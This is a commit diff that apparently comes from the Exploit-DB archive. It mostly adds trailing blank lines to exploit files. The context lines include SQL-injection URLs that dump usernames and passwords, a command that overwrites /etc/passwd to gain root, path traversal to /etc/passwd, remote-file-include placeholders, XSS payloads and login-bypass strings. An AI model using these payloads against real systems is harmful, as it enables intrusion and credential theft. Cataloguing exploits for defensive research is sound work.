DB: 2021-09-03

28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00 · 2021-09-03 20:19:21 +00:00 · b4c96a5864
commit b4c96a5864
parent 27211ca2e7
28807 changed files with 217113 additions and 216600 deletions
--- a/exploits/aix/local/45938.pl
+++ b/exploits/aix/local/45938.pl
@ -139,3 +139,4 @@ $result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/us

 print "[-] Done \n";
 print "[+] 'su wow' for root shell \n";
+
--- a/exploits/asp/webapps/15703.txt
+++ b/exploits/asp/webapps/15703.txt
@ -34,3 +34,5 @@ Personal
 #   KinG,Bl4ckl0rd,Turk_server

 #   Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon
+
+
--- a/exploits/asp/webapps/16241.txt
+++ b/exploits/asp/webapps/16241.txt
@ -24,3 +24,4 @@ POC
 ---
 http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
 http://www.site.com/news/news.asp?id=256 and 1=0 FALSE
+
--- a/exploits/asp/webapps/32660.txt
+++ b/exploits/asp/webapps/32660.txt
@ -8,3 +8,6 @@
 [+] Vulnerable File: default.asp
 [+} Dork : intext:"Powered by CIS Manager"
 [+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection]
+
+
+
--- a/exploits/bsd/dos/19488.c
+++ b/exploits/bsd/dos/19488.c
@ -32,3 +32,6 @@ write(p[1], crap, BUFFERSIZE);
 }
 exit(0);
 }
+
+
+
--- a/exploits/cfm/webapps/15120.txt
+++ b/exploits/cfm/webapps/15120.txt
@ -106,3 +106,4 @@ References

    * Vendor advisory: http://www.getmura.com/index.cfm/blog/critical-security-patch/
    * CVE item: CVE-2010-3468
+
--- a/exploits/cfm/webapps/16225.txt
+++ b/exploits/cfm/webapps/16225.txt
@ -7,3 +7,5 @@ SQL
 ---

 http://site.com/path/dsp_page.cfm?pageid=[SQL]
+
+
--- a/exploits/cgi/webapps/29844.txt
+++ b/exploits/cgi/webapps/29844.txt
@ -13,3 +13,6 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: N

 required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In
+
+
+
--- a/exploits/cgi/webapps/39871.txt
+++ b/exploits/cgi/webapps/39871.txt
@ -42,3 +42,4 @@
  Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK

  Base64 Decoded: 127.0.0.1	localhost.localdomain	localhost
+
--- a/exploits/hardware/remote/39823.py
+++ b/exploits/hardware/remote/39823.py
@ -474,3 +474,4 @@ if __name__ == "__main__":

    # Hopefully we'll get something interesting
    exploit.interact()
+
--- a/exploits/hardware/remote/43105.txt
+++ b/exploits/hardware/remote/43105.txt
@ -37,3 +37,5 @@ root
 Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
 # cat /etc/zyfwinfo
 Vendor Name:                      ZyXEL Communications Corp.
+
+
--- a/exploits/hardware/webapps/31088.py
+++ b/exploits/hardware/webapps/31088.py
@ -53,3 +53,6 @@ def main():

 if __name__ == '__main__':
     main()
+
+
+
--- a/exploits/hardware/webapps/32237.txt
+++ b/exploits/hardware/webapps/32237.txt
@ -50,3 +50,4 @@ onclick=prompt(1)>XSS</button>

 # More information can be found at:
 http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/
+
--- a/exploits/hardware/webapps/32883.txt
+++ b/exploits/hardware/webapps/32883.txt
@ -96,3 +96,9 @@ wndr3400: 10198 for wndr3400


 ******************************************************************************************************************************
+
+
+
+
+
+
--- a/exploits/hardware/webapps/33138.txt
+++ b/exploits/hardware/webapps/33138.txt
@ -39,3 +39,4 @@ Steps to reproduce / PoC:

 6. go to another page and navigate back into QoS - the XSS error pops up.
 	- PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70
+
--- a/exploits/hardware/webapps/35933.txt
+++ b/exploits/hardware/webapps/35933.txt
@ -48,3 +48,4 @@ Sobhan system Co.
 Signal Network And Security Group (www.signal-net.net)

 E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
+
--- a/exploits/hardware/webapps/38004.txt
+++ b/exploits/hardware/webapps/38004.txt
@ -91,3 +91,5 @@ http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583
 Shad Malloy

 Secure Network Management, LLC
+
+
--- a/exploits/hardware/webapps/42986.txt
+++ b/exploits/hardware/webapps/42986.txt
@ -20,3 +20,6 @@ PoC:
 - Then put the script (<script>alert(1)</script>)

 - Xss Vulnerability
+
+
+
--- a/exploits/ios/remote/34399.txt
+++ b/exploits/ios/remote/34399.txt
@ -82,3 +82,25 @@ We can look for all the memos by incrementing the value of "id"


 #SaMaN(@samanL33T)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
--- a/exploits/irix/local/19280.txt
+++ b/exploits/irix/local/19280.txt
@ -35,3 +35,6 @@ ln -s /.rhosts fsdump.dir
 /var/rfindd/fsdump -Fgimme /
 ls -al /.rhosts
 rm -f fsdump.dir fsdump.pag gimme
+
+
+
--- a/exploits/irix/local/19353.txt
+++ b/exploits/irix/local/19353.txt
@ -21,3 +21,6 @@ execl("/sbin/suid_exec","/bin/su","/bin/su",0);
 Too many ('s.
 % ls -l /tmp/sh
 -r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*
+
+
+
--- a/exploits/json/webapps/42579.txt
+++ b/exploits/json/webapps/42579.txt
@ -57,3 +57,4 @@ Content-Disposition: form-data; name="BackupConfig[Upload][Description]"

 <script>confirm(017)</script>
 ------WebKitFormBoundary8FfEu2Tn6fUOnT80--
+
--- a/exploits/jsp/remote/18179.html
+++ b/exploits/jsp/remote/18179.html
@ -66,3 +66,7 @@ height = "99%"
 </applet>
 </body>
 </html>
+
+
+
+
--- a/exploits/jsp/webapps/17503.pl
+++ b/exploits/jsp/webapps/17503.pl
@ -431,3 +431,6 @@ $ret=$paths[$i];
                return $ret;

 }
+
+
+
--- a/exploits/jsp/webapps/35910.txt
+++ b/exploits/jsp/webapps/35910.txt
@ -53,3 +53,4 @@ Sobhan system Co.
 Signal Network And Security Group (www.signal-net.net)

 E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
+
--- a/exploits/linux/dos/15062.txt
+++ b/exploits/linux/dos/15062.txt
@ -106,3 +106,7 @@ PoC


 ###########################################################################
+
+
+
+
--- a/exploits/linux/dos/21122.sh
+++ b/exploits/linux/dos/21122.sh
@ -37,3 +37,5 @@ mklink 1
 mklink 0 /../../../../../../../etc/services
 mkdir l5
 mkdir l
+
+
--- a/exploits/linux/dos/23076.pl
+++ b/exploits/linux/dos/23076.pl
@ -87,3 +87,4 @@ foreach my $command (@commands) {
 	}
 }
  $mysql->close;
+
--- a/exploits/linux/dos/41715.txt
+++ b/exploits/linux/dos/41715.txt
@ -133,3 +133,8 @@ Tested on:
 ===============

 Linux Ubuntu x86_64
+
+
+
+
+
--- a/exploits/linux/remote/18145.py
+++ b/exploits/linux/remote/18145.py
@ -196,3 +196,5 @@ print "\t[+] Evil packet length : %d"%len(evil_packet)

 print "\t[+] Sending packet to broadcast"
 sendp(evil_packet)
+
+
--- a/exploits/linux/remote/31076.py
+++ b/exploits/linux/remote/31076.py
@ -55,3 +55,4 @@ except Exception, e:
 WinXP Prof SP2 ES)"
     print "           python mplayer_poc.py filename.mov linux     (For
 Linux Gentoo)"
+
--- a/exploits/linux/remote/32965.c
+++ b/exploits/linux/remote/32965.c
@ -69,3 +69,4 @@ main (void)

  return 0;
 }
+
--- a/exploits/linux/remote/41910.sh
+++ b/exploits/linux/remote/41910.sh
@ -191,3 +191,4 @@ fi

 # Done
 echo -e "\n[*] All done. Exiting"
+
--- a/exploits/linux/remote/42697.rb
+++ b/exploits/linux/remote/42697.rb
@ -234,3 +234,4 @@ sub get_license() {
        return \@out;
    }
 }
+
--- a/exploits/linux/remote/42709.rb
+++ b/exploits/linux/remote/42709.rb
@ -168,3 +168,4 @@ sub get_log_line {
                return \@ret;
        }
 }
+
--- a/exploits/multiple/dos/42666.txt
+++ b/exploits/multiple/dos/42666.txt
@ -77,3 +77,4 @@ for (let i in {xx: 0}) {
        i = new Uint32Array([0, 1, 0x777777, 0, 0]);
    }
 }
+
--- a/exploits/multiple/dos/42969.rb
+++ b/exploits/multiple/dos/42969.rb
@ -60,3 +60,4 @@ while (true) try {
    send_response(cli, @html)
  end
 end
+
--- a/exploits/multiple/remote/14387.html
+++ b/exploits/multiple/remote/14387.html
@ -38,3 +38,7 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>
+
+
+
+
--- a/exploits/multiple/remote/18245.py
+++ b/exploits/multiple/remote/18245.py
@ -646,3 +646,4 @@ def main():

 if __name__ == '__main__':
    main()
+
--- a/exploits/multiple/remote/32762.pl
+++ b/exploits/multiple/remote/32762.pl
@ -176,3 +176,5 @@ chomp($line);
  print "\n\n";
  close(Userfile);
 }
+
+
--- a/exploits/multiple/remote/35352.rb
+++ b/exploits/multiple/remote/35352.rb
@ -76,3 +76,14 @@ Request distribution per hour
  1:00 ? 0 hits/day ?
  ...
 =end
+
+
+
+
+
+
+
+
+
+
+
--- a/exploits/multiple/remote/42885.rb
+++ b/exploits/multiple/remote/42885.rb
@ -182,3 +182,4 @@ james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677
 # localhost name resolution is handled within DNS itself.
 #
 #
+
--- a/exploits/multiple/webapps/12730.txt
+++ b/exploits/multiple/webapps/12730.txt
@ -48,3 +48,5 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
--- a/exploits/multiple/webapps/33493.txt
+++ b/exploits/multiple/webapps/33493.txt
@ -39,3 +39,5 @@ Setup -> Smart links -> Create new smart link -> Title it <script>alert("XSS")</

 5. Proof of concept video
 http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi
+
+
--- a/exploits/multiple/webapps/42610.txt
+++ b/exploits/multiple/webapps/42610.txt
@ -312,3 +312,5 @@ of vulnerability-lab team & the specific authors or managers. To record, list, m
 --
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
+
+
--- a/exploits/nodejs/webapps/43054.txt
+++ b/exploits/nodejs/webapps/43054.txt
@ -43,3 +43,4 @@ Reference:

 https://github.com/keystonejs/keystone/pull/4478
 https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
+
--- a/exploits/novell/dos/14928.py
+++ b/exploits/novell/dos/14928.py
@ -35,3 +35,7 @@ try:

 except Exception,err:
 	print err
+
+
+
+
--- a/exploits/php/webapps/10069.php
+++ b/exploits/php/webapps/10069.php
@ -53,3 +53,5 @@ echo $resp;
 echo "[+]done!\r\n";
 echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash"
 ?>
+
+
--- a/exploits/php/webapps/10407.txt
+++ b/exploits/php/webapps/10407.txt
@ -37,3 +37,5 @@ http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product
 - HI Cyber4rt crew
 [Facebook: Hacker Indonesia]
 - all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU
+
+
--- a/exploits/php/webapps/10656.txt
+++ b/exploits/php/webapps/10656.txt
@ -23,3 +23,4 @@ http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name
 [+] http://www.youtube.com/watch?v=uEK_Ah3htr0
 ======================================================================================
 [+]Special Thanks:- Hangaw_hawlery & FormatXformaT   and all kurd-security members
+
--- a/exploits/php/webapps/11674.txt
+++ b/exploits/php/webapps/11674.txt
@ -26,3 +26,4 @@
 [+] Exploitable

    http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--
+
--- a/exploits/php/webapps/11676.txt
+++ b/exploits/php/webapps/11676.txt
@ -54,3 +54,4 @@


 #If you have any questions, comments, or concerns, feel free to contact me.
+
--- a/exploits/php/webapps/11829.txt
+++ b/exploits/php/webapps/11829.txt
@ -27,3 +27,4 @@
 [+] Exploitable

    http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--
+
--- a/exploits/php/webapps/12101.txt
+++ b/exploits/php/webapps/12101.txt
@ -29,3 +29,4 @@ Greetz   :   -:-  SkyCreW  -:-
     Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk

 (o)===================================================================================(o)
+
--- a/exploits/php/webapps/12325.txt
+++ b/exploits/php/webapps/12325.txt
@ -11,3 +11,4 @@ dork :inurl:index.php?option=com_portfolio
 exp:

 http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd
+
--- a/exploits/php/webapps/12395.txt
+++ b/exploits/php/webapps/12395.txt
@ -35,3 +35,6 @@ ShoutZ :
 Greetz :
 --------
 ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr--
+
+
+
--- a/exploits/php/webapps/12410.txt
+++ b/exploits/php/webapps/12410.txt
@ -27,3 +27,8 @@ modules.php?op=modload&name=News&file=article&sid=[ SQL ]


 http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
+
+
+
+
+
--- a/exploits/php/webapps/12415.txt
+++ b/exploits/php/webapps/12415.txt
@ -23,3 +23,5 @@ ShoutZ :
 Greetz :
 --------
 ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR--
+
+
--- a/exploits/php/webapps/12635.txt
+++ b/exploits/php/webapps/12635.txt
@ -30,3 +30,5 @@ HCJ


  g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !
+
+
--- a/exploits/php/webapps/12651.txt
+++ b/exploits/php/webapps/12651.txt
@ -26,3 +26,6 @@
 * For HaMaDa SCoOoRPioN are you layz????? copy my exploit???
  http://securityreason.com/securityalert/7161
  http://securityreason.com/exploitalert/7413   Look Date!!! your copy my style!!!
+
+
+
--- a/exploits/php/webapps/12671.txt
+++ b/exploits/php/webapps/12671.txt
@ -40,3 +40,4 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
--- a/exploits/php/webapps/12709.txt
+++ b/exploits/php/webapps/12709.txt
@ -47,3 +47,7 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
+
+
--- a/exploits/php/webapps/12713.txt
+++ b/exploits/php/webapps/12713.txt
@ -47,3 +47,5 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
--- a/exploits/php/webapps/12714.txt
+++ b/exploits/php/webapps/12714.txt
@ -47,3 +47,5 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
--- a/exploits/php/webapps/12735.txt
+++ b/exploits/php/webapps/12735.txt
@ -51,3 +51,5 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
--- a/exploits/php/webapps/12761.txt
+++ b/exploits/php/webapps/12761.txt
@ -46,3 +46,8 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
+
+
+
--- a/exploits/php/webapps/12793.txt
+++ b/exploits/php/webapps/12793.txt
@ -48,3 +48,8 @@ am nt hacker just Lik3 Syst3m S3curity
 .-----..-----.|  |--..--.--..----.|__||  |_ |__|.-----..-----.|  ||__|.-----..-----.
 |__ --||  -__||    < |  |  ||   _||  ||   _||  ||  _  ||     ||  ||  ||     ||  -__|
 |_____||_____||__|__||_____||__|  |__||____||__||_____||__|__||__||__||__|__||_____|
+
+
+
+
+
--- a/exploits/php/webapps/14160.txt
+++ b/exploits/php/webapps/14160.txt
@ -23,3 +23,4 @@ op=add&userid=consultor1&password_changed=true&PASS1=xxxx&PASS2=xxxx&desc=%3Cscr
 ####################################################################################

 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14160.pdf
+
--- a/exploits/php/webapps/14502.txt
+++ b/exploits/php/webapps/14502.txt
@ -20,3 +20,4 @@ http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1
 ############################################################
 Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM"
 ############################################################
+
--- a/exploits/php/webapps/14592.txt
+++ b/exploits/php/webapps/14592.txt
@ -22,3 +22,4 @@ http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT
 ############################################################
 #.Türk oğlu, !!..Türk kızı !!..Türklügünü Koru!..
 ############################################################
+
--- a/exploits/php/webapps/14618.txt
+++ b/exploits/php/webapps/14618.txt
@ -15,3 +15,5 @@ ____________________________________________
 A special tribute to:

 DannY.iRaQi - TeaM iRaQ HaCkers
+
+
--- a/exploits/php/webapps/14639.txt
+++ b/exploits/php/webapps/14639.txt
@ -10,3 +10,6 @@
 Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
+
+
+
--- a/exploits/php/webapps/14712.txt
+++ b/exploits/php/webapps/14712.txt
@ -10,3 +10,8 @@
 Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
+
+
+
+
+
--- a/exploits/php/webapps/14722.txt
+++ b/exploits/php/webapps/14722.txt
@ -61,3 +61,4 @@ Joomla!   (Multiple) ExploiT
 # Thanks : milw0rm.com & exploit-db.com  & offsec.com & inj3ct0r.com & www.hack0wn.com

 exit ,, / Praise be to God for the blessing of Islam
+
--- a/exploits/php/webapps/14799.txt
+++ b/exploits/php/webapps/14799.txt
@ -10,3 +10,8 @@
 Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
+
+
+
+
+
--- a/exploits/php/webapps/14827.py
+++ b/exploits/php/webapps/14827.py
@ -78,3 +78,6 @@ else:
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

 exit(0)
+
+
+
--- a/exploits/php/webapps/14837.txt
+++ b/exploits/php/webapps/14837.txt
@ -26,3 +26,4 @@ http://localhost/cf_image_host_v1.3.81/inc/config.php?settings[SET_LANGUAGE]=[EV

 Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
 Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members Sa-HaCkE
+
--- a/exploits/php/webapps/14839.txt
+++ b/exploits/php/webapps/14839.txt
@ -31,3 +31,4 @@ Put on the name & body of your comment any html code like:

 [~] Another note : You can bypass the limit of comments per day in this guestbook script
 By deleting the saved cookie in your computer ;)
+
--- a/exploits/php/webapps/14841.txt
+++ b/exploits/php/webapps/14841.txt
@ -30,3 +30,4 @@ http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]

 Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
 Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members Sa-HaCkE
+
--- a/exploits/php/webapps/14849.py
+++ b/exploits/php/webapps/14849.py
@ -79,3 +79,5 @@ else:
    exploit(sys.argv[1], sys.argv[2])

 exit(0)
+
+
--- a/exploits/php/webapps/14894.py
+++ b/exploits/php/webapps/14894.py
@ -111,3 +111,4 @@ else:
    exploit(sys.argv[1], sys.argv[2])

 exit(0)
+
--- a/exploits/php/webapps/14896.txt
+++ b/exploits/php/webapps/14896.txt
@ -10,3 +10,8 @@
 Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
 Greetings:  No
+
+
+
+
+
--- a/exploits/php/webapps/14915.txt
+++ b/exploits/php/webapps/14915.txt
@ -150,3 +150,4 @@ InterPhoto CMS  has used Smarty library(Templet Engine).
 			if(class_exists('Smarty')){
 		Add last page:
 			}
+
--- a/exploits/php/webapps/14927.txt
+++ b/exploits/php/webapps/14927.txt
@ -65,3 +65,5 @@ DynPage is written in PHP and does not require MySQL database. It's easy to inst
 		?>
 	+POC:for see this hash:
 	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00
+
+
--- a/exploits/php/webapps/14931.php
+++ b/exploits/php/webapps/14931.php
@ -122,3 +122,4 @@ $guyanarules = new Javabridgexploit($argv);


 ?>
+
--- a/exploits/php/webapps/14985.txt
+++ b/exploits/php/webapps/14985.txt
@ -31,3 +31,4 @@ Greetz to all brothers & sisters who are fighting for freedom in IRAN...
 خدا شما کمک خواهد کرد

 contact : secret_hf@hotmail.com
+
--- a/exploits/php/webapps/15121.txt
+++ b/exploits/php/webapps/15121.txt
@ -57,3 +57,4 @@ Mail    : !x!
    All my friends
    |No-Exploit.com Members
 -------------------------------------
+
--- a/exploits/php/webapps/15389.php
+++ b/exploits/php/webapps/15389.php
@ -74,3 +74,5 @@ while(1)
 else break;
 }
 ?>
+
+
--- a/exploits/php/webapps/15453.txt
+++ b/exploits/php/webapps/15453.txt
@ -16,3 +16,5 @@ http://site.com/index.php?option=com_ckforms&controller=../../../.

 ####################################################################
 RxH & ab0-3th4b
+
+
--- a/exploits/php/webapps/15454.txt
+++ b/exploits/php/webapps/15454.txt
@ -17,3 +17,5 @@ www.site.com/index.php?action=com_clan&cid=185[Sql Injection]
 185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8

 ####################################################################
+
+
--- a/exploits/php/webapps/15524.txt
+++ b/exploits/php/webapps/15524.txt
@ -14,3 +14,5 @@ In The Name Of GOD
            go to /signinform.php
            Username : admin
            Password : 1'or'1'='1
+
+
--- a/exploits/php/webapps/15568.py
+++ b/exploits/php/webapps/15568.py
@ -245,3 +245,4 @@ if sys.argv[3] == '-s':
        printHelp()
    getSchemas(sessid, sys.argv[1], sys.argv[2], valId)
    exit(0)
+
--- a/exploits/php/webapps/15585.txt
+++ b/exploits/php/webapps/15585.txt
@ -20,3 +20,6 @@ _______________________________________________________________________

 Thanks to : All RosebanditZ Team & All IndonesiaCoder
 _______________________________________________________________________
+
+
+
--- a/exploits/php/webapps/15621.txt
+++ b/exploits/php/webapps/15621.txt
@ -25,3 +25,6 @@ di anak tirikan karena ga tersebut nicknya)
 [#]-------------------------------------------------------------------
 note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap
 apa yang kau katakan!
+
+
+
--- a/exploits/php/webapps/15638.txt
+++ b/exploits/php/webapps/15638.txt
@ -37,3 +37,4 @@ Duhok Forum Remot upload Vulnerability
 greetz : kader11000 lagripe-dz  mca_crb NetCat-Dz    all dz members

 www.h4kz.net   www.v4-team.com   www.vbspiders.com  www.dz4all.com/cc
+
--- a/exploits/php/webapps/15720.txt
+++ b/exploits/php/webapps/15720.txt
@ -41,3 +41,6 @@ makassarhacker.com ]

 note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap
 apa yang kau katakan!
+
+
+
--- a/exploits/php/webapps/15813.txt
+++ b/exploits/php/webapps/15813.txt
@ -64,3 +64,5 @@ Password: 'or'a'='a


 ####################################################################
+
+
--- a/exploits/php/webapps/15814.txt
+++ b/exploits/php/webapps/15814.txt
@ -14,3 +14,7 @@ www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_abs
 www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]

 ####################################################################
+
+
+
+
--- a/exploits/php/webapps/15815.txt
+++ b/exploits/php/webapps/15815.txt
@ -13,3 +13,7 @@ Joomla Component com_adsmanager Remote File Include
 www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

 ####################################################################
+
+
+
+
--- a/exploits/php/webapps/15891.txt
+++ b/exploits/php/webapps/15891.txt
@ -19,3 +19,7 @@ www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a
 www.site.com/gadmin/index.php

 ####################################################################
+
+
+
+
--- a/Show more
+++ b/Show more
				`@ -96,3 +96,9 @@ wndr3400: 10198 for wndr3400`


				`******************************************************************************************************************************`
				`@ -82,3 +82,25 @@ We can look for all the memos by incrementing the value of "id"`


				`#SaMaN(@samanL33T)`
				`@ -106,3 +106,7 @@ PoC`


				`###########################################################################`
				`@ -54,3 +54,4 @@`


				`#If you have any questions, comments, or concerns, feel free to contact me.`
				`@ -27,3 +27,8 @@ modules.php?op=modload&name=News&file=article&sid=[ SQL ]`


				`http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--`
				`@ -30,3 +30,5 @@ HCJ`


				`g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !`
				`@ -122,3 +122,4 @@ $guyanarules = new Javabridgexploit($argv);`


				`?>`
				`@ -64,3 +64,5 @@ Password: 'or'a'='a`


				`####################################################################`